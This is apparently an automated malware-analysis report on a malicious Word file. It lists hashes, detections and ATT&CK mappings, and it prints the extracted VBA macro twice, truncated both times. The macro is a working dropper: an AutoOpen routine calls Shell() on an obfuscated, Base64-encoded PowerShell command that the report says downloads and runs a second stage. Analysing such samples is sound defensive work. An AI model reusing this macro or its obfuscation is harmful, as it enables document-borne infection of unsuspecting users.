Office (OLE) malware analysis — malicious · a4b927f123929d34

MALICIOUS

Office (OLE)

80.8 KB Created: 2018-06-07 21:44:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: 65d1398f8d9d082ace00d8e671c6ada5 SHA-1: 206d590f6887a3a0bb23897a57e1708ba68c9a4c SHA-256: a4b927f123929d344aca679f0dcc58cf4a8507c1268d4bdfba5bede1035200ea

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that calls Shell() to execute a PowerShell command. The PowerShell command is obfuscated using Base64 encoding and appears to be designed to download and execute a second-stage payload. The presence of the Shell() call and the obfuscated PowerShell command strongly indicate a dropper or downloader functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6577061-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6577061-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10997 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10997 bytes
SHA-256: `e268f62d5020e3a4a31c80881b4c4e029686f40a54326950cddbde28ee117f3b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WKlPfBQGqOzIJ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function EjIut() On Error Resume Next bdrbwk = Tan(hkzmoD _ * Tan(WMijAm * Int(jdvSZj * Sqr(43899) / SXWLw + Fix(1521)) / 60222 * Round(95934 / Log(21096 - GdTpiX) + 70292 - vGfNqO)) _ / 44554 + Log(78690)) AwIZAb = Tan(RZPcH _ * Tan(qOTEtJ * Int(tuYhho * Sqr(31924) / FhIoHH + Fix(59777)) / 3459 * Round(4385 / Log(4538 - CBXIH) + 14544 - JPRtlV)) _ / 27019 + Log(21383)) EjIut = tOihEYwGlZ + Shell(kriniYq + Chr(HIEzz + vbKeyP + NBbFA) + wlsHjZMDD + VdlTvJHvJz + ckJazwP + DwhnQZuCJw, 19538 - 19538) FXarMK = Tan(MsHoAd _ * Tan(MRCmG * Int(WmRazi * Sqr(2344) / Lvnaw + Fix(17538)) / 49685 * Round(57948 / Log(53040 - trULP) + 99802 - jjDEc)) _ / 67867 + Log(66281)) End Function Sub Autoopen() On Error Resume Next jcSGA = Tan(iJOBzU _ * Tan(EUlip * Int(sOHLWR * Sqr(14387) / zzOiM + Fix(8927)) / 36191 * Round(24748 / Log(62657 - XbRLi) + 12765 - SfEfL)) _ / 34029 + Log(42469)) EjIut rpsbRw = Tan(sfkLzS _ * Tan(PvrofK * Int(ahjAA * Sqr(8308) / Cimfsw + Fix(38971)) / 28535 * Round(49835 / Log(71244 - Kiilb) + 43412 - rjPJn)) _ / 45154 + Log(74392)) End Sub Attribute VB_Name = "XRIMbQsD" Function wlsHjZMDD() On Error Resume Next AiiZi = Tan(VAhjZ _ * Tan(fJzJiC * Int(NiEQKJ * Sqr(10382) / LEJMH + Fix(48010)) / 23531 * Round(17813 / Log(17954 - cnpmT) + 51502 - tCWVAw)) _ / 27103 + Log(34445)) LTFfkdfWD = "ower" + "sHe" + "LL -e IAA" + "oACAAbgBlAHcAL" + "QBvAGIASgBFAGMA" + "VAAgAFMAeQBzAHQ" + "ARQBNAC4AaQ" + "BvAC4AQwBPAG0A" zivOT = Tan(ZAKwY _ * Tan(RZSAn * Int(GPnaLd * Sqr(41099) / HivLI + Fix(90280)) / 88873 * Round(10959 / Log(48151 - NuBMNp) + 55242 - CXcdD)) _ / 41060 + Log(23864)) iCNHdXdw = "cABSA" + "GUAcw" + "BTAEkATwBuAC4A" + "RABFAEYA" + "TABhAFQARQBTAFQ" HCOZX = Tan(tCHqE _ * Tan(odcMzp * Int(tmtBww * Sqr(76668) / zoifZw + Fix(109)) / 75429 * Round(84018 / Log(82697 - GwBzFX) + 69585 - iYvPdO)) _ / 67063 + Log(36922)) jUGnzfddOEA = "AcgBFA" + "GEAbQAoAFsA" + "UwBZAFM" + "AdABFAG0AL" + "gBpAG8ALgBtAG" OBQaj = Tan(vNcLfz _ * Tan(qlVAiq * Int(nodOUE * Sqr(6866) / ZBQrf + Fix(58043)) / 47945 * Round(81863 / Log(51295 - WGFlc) + 23576 - iuhKu)) _ / 55789 + Log(60817)) TQimJs = "UATQBvAFIAeQ" + "BzAFQAUgB" + "FAGEAbQBdAFs" + "AcwBZAHMAd" + "AB" + "FAE0ALgBDAG8AT" biaXCG = Tan(mtoauo _ * Tan(KRuub * Int(jnBLR * Sqr(17460) / KVsiYl + Fix(96936)) / 9211 * Round(91103 / Log(97526 - YRsUL) + 92627 - RRKkQ)) _ / 29931 + Log(232)) BWwwawCQX = "gBWAG" + "UAUgBUAF0A" + "OgA6A" + "EYA" + "UgBvAG0AQgBB" + "AHMAZQA2ADQ" + "AUwBUAHIASQBOA" TInjO = Tan(tRUQA _ * Tan(BJpPO * Int(bWJTP * Sqr(52663) / JzsfZ + Fix(11148)) / 55561 * Round(58177 / Log(44129 - pQOjN) + 60484 - XDKlz)) _ / 16886 + Log(52662)) LiphrZh = "EcAKA" + "AgACcAVg" + "BaAEIAYg" + "BUADgAS" + "gBBAEUASQB" + "YAC8AeQBqADQAMA" + "BhAFIAdABsA" + "EsAeQBKAEcAYQ" wlsHjZMDD = LTFfkdfWD + iCNHdXdw + jUGnzfddOEA + TQimJs + BWwwawCQX + LiphrZh End Function Function VdlTvJHvJz() On Error Resume Next Vzoisz = Tan(MbFFBm _ * Tan(KYjirA * Int(AjNqIv * Sqr(22226) / UJrQj + Fix(7748)) / 16625 * Round(77717 / Log(282 - RwEniI) + 58492 - dtmFU)) _ / 33313 + Log(52548)) ERwiDjMocj = "BVAHc" + "AdwBYAEwAdwBrAE" + "kASwBFAG8" + "AYQBrAHo" + "ATQBkAGoAdg" + "BRAHA" VObnkD = Tan(vGvOkC _ * Tan(BjjAZD * Int(MEFMuS * Sqr(34842) / OoZpmi + Fix(89467)) / 25243 * Round(24226 / Log(88183 - OIjit) + 88526 - nrCZU)) _ / 84315 + Log(45334)) lsFSSt = "AZQAwAHUAYg" + "BFAGQASwBKAGY" + "AeAAzAGwA" + "MQBzAE" + "0AT" + "AA1AF" IJWbp = Tan(PRrHpv _ * Tan(HHWTG * Int(pljVL * Sqr(34833) / fabpUh + Fix(34156)) / 66909 * Round(49594 / Log(70927 - lDcwqo) + 52863 - wufkj)) _ / 10393 + Log(25299)) kfBQpGGY = "AATQBuAEc" + "AOAB5AGMANAA" + "1AD" + "EAUAAzAHUAWQB" + "QAEMAbAB5A" + "FIA" + "eQBRAFUARgB" + "SAFgATwBnAE" + "MAUABSA" + "FQARQBZAHEAO" iRcnKJ = Tan(FpqBm ... (truncated)

SHA-256: e268f62d5020e3a4a31c80881b4c4e029686f40a54326950cddbde28ee117f3b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WKlPfBQGqOzIJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EjIut()
On Error Resume Next
bdrbwk = Tan(hkzmoD _
* Tan(WMijAm * Int(jdvSZj * Sqr(43899) / SXWLw + Fix(1521)) / 60222 * Round(95934 / Log(21096 - GdTpiX) + 70292 - vGfNqO)) _
/ 44554 + Log(78690))
AwIZAb = Tan(RZPcH _
* Tan(qOTEtJ * Int(tuYhho * Sqr(31924) / FhIoHH + Fix(59777)) / 3459 * Round(4385 / Log(4538 - CBXIH) + 14544 - JPRtlV)) _
/ 27019 + Log(21383))
EjIut = tOihEYwGlZ + Shell(kriniYq + Chr(HIEzz + vbKeyP + NBbFA) + wlsHjZMDD + VdlTvJHvJz + ckJazwP + DwhnQZuCJw, 19538 - 19538)
FXarMK = Tan(MsHoAd _
* Tan(MRCmG * Int(WmRazi * Sqr(2344) / Lvnaw + Fix(17538)) / 49685 * Round(57948 / Log(53040 - trULP) + 99802 - jjDEc)) _
/ 67867 + Log(66281))
End Function
Sub Autoopen()
On Error Resume Next
jcSGA = Tan(iJOBzU _
* Tan(EUlip * Int(sOHLWR * Sqr(14387) / zzOiM + Fix(8927)) / 36191 * Round(24748 / Log(62657 - XbRLi) + 12765 - SfEfL)) _
/ 34029 + Log(42469))
EjIut
rpsbRw = Tan(sfkLzS _
* Tan(PvrofK * Int(ahjAA * Sqr(8308) / Cimfsw + Fix(38971)) / 28535 * Round(49835 / Log(71244 - Kiilb) + 43412 - rjPJn)) _
/ 45154 + Log(74392))
End Sub



Attribute VB_Name = "XRIMbQsD"
Function wlsHjZMDD()
On Error Resume Next
AiiZi = Tan(VAhjZ _
* Tan(fJzJiC * Int(NiEQKJ * Sqr(10382) / LEJMH + Fix(48010)) / 23531 * Round(17813 / Log(17954 - cnpmT) + 51502 - tCWVAw)) _
/ 27103 + Log(34445))
LTFfkdfWD = "ower" + "sHe" + "LL -e IAA" + "oACAAbgBlAHcAL" + "QBvAGIASgBFAGMA" + "VAAgAFMAeQBzAHQ" + "ARQBNAC4AaQ" + "BvAC4AQwBPAG0A"
zivOT = Tan(ZAKwY _
* Tan(RZSAn * Int(GPnaLd * Sqr(41099) / HivLI + Fix(90280)) / 88873 * Round(10959 / Log(48151 - NuBMNp) + 55242 - CXcdD)) _
/ 41060 + Log(23864))
iCNHdXdw = "cABSA" + "GUAcw" + "BTAEkATwBuAC4A" + "RABFAEYA" + "TABhAFQARQBTAFQ"
HCOZX = Tan(tCHqE _
* Tan(odcMzp * Int(tmtBww * Sqr(76668) / zoifZw + Fix(109)) / 75429 * Round(84018 / Log(82697 - GwBzFX) + 69585 - iYvPdO)) _
/ 67063 + Log(36922))
jUGnzfddOEA = "AcgBFA" + "GEAbQAoAFsA" + "UwBZAFM" + "AdABFAG0AL" + "gBpAG8ALgBtAG"
OBQaj = Tan(vNcLfz _
* Tan(qlVAiq * Int(nodOUE * Sqr(6866) / ZBQrf + Fix(58043)) / 47945 * Round(81863 / Log(51295 - WGFlc) + 23576 - iuhKu)) _
/ 55789 + Log(60817))
TQimJs = "UATQBvAFIAeQ" + "BzAFQAUgB" + "FAGEAbQBdAFs" + "AcwBZAHMAd" + "AB" + "FAE0ALgBDAG8AT"
biaXCG = Tan(mtoauo _
* Tan(KRuub * Int(jnBLR * Sqr(17460) / KVsiYl + Fix(96936)) / 9211 * Round(91103 / Log(97526 - YRsUL) + 92627 - RRKkQ)) _
/ 29931 + Log(232))
BWwwawCQX = "gBWAG" + "UAUgBUAF0A" + "OgA6A" + "EYA" + "UgBvAG0AQgBB" + "AHMAZQA2ADQ" + "AUwBUAHIASQBOA"
TInjO = Tan(tRUQA _
* Tan(BJpPO * Int(bWJTP * Sqr(52663) / JzsfZ + Fix(11148)) / 55561 * Round(58177 / Log(44129 - pQOjN) + 60484 - XDKlz)) _
/ 16886 + Log(52662))
LiphrZh = "EcAKA" + "AgACcAVg" + "BaAEIAYg" + "BUADgAS" + "gBBAEUASQB" + "YAC8AeQBqADQAMA" + "BhAFIAdABsA" + "EsAeQBKAEcAYQ"
wlsHjZMDD = LTFfkdfWD + iCNHdXdw + jUGnzfddOEA + TQimJs + BWwwawCQX + LiphrZh
End Function
Function VdlTvJHvJz()
On Error Resume Next
Vzoisz = Tan(MbFFBm _
* Tan(KYjirA * Int(AjNqIv * Sqr(22226) / UJrQj + Fix(7748)) / 16625 * Round(77717 / Log(282 - RwEniI) + 58492 - dtmFU)) _
/ 33313 + Log(52548))
ERwiDjMocj = "BVAHc" + "AdwBYAEwAdwBrAE" + "kASwBFAG8" + "AYQBrAHo" + "ATQBkAGoAdg" + "BRAHA"
VObnkD = Tan(vGvOkC _
* Tan(BjjAZD * Int(MEFMuS * Sqr(34842) / OoZpmi + Fix(89467)) / 25243 * Round(24226 / Log(88183 - OIjit) + 88526 - nrCZU)) _
/ 84315 + Log(45334))
lsFSSt = "AZQAwAHUAYg" + "BFAGQASwBKAGY" + "AeAAzAGwA" + "MQBzAE" + "0AT" + "AA1AF"
IJWbp = Tan(PRrHpv _
* Tan(HHWTG * Int(pljVL * Sqr(34833) / fabpUh + Fix(34156)) / 66909 * Round(49594 / Log(70927 - lDcwqo) + 52863 - wufkj)) _
/ 10393 + Log(25299))
kfBQpGGY = "AATQBuAEc" + "AOAB5AGMANAA" + "1AD" + "EAUAAzAHUAWQB" + "QAEMAbAB5A" + "FIA" + "eQBRAFUARgB" + "SAFgATwBnAE" + "MAUABSA" + "FQARQBZAHEAO"
iRcnKJ = Tan(FpqBm 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.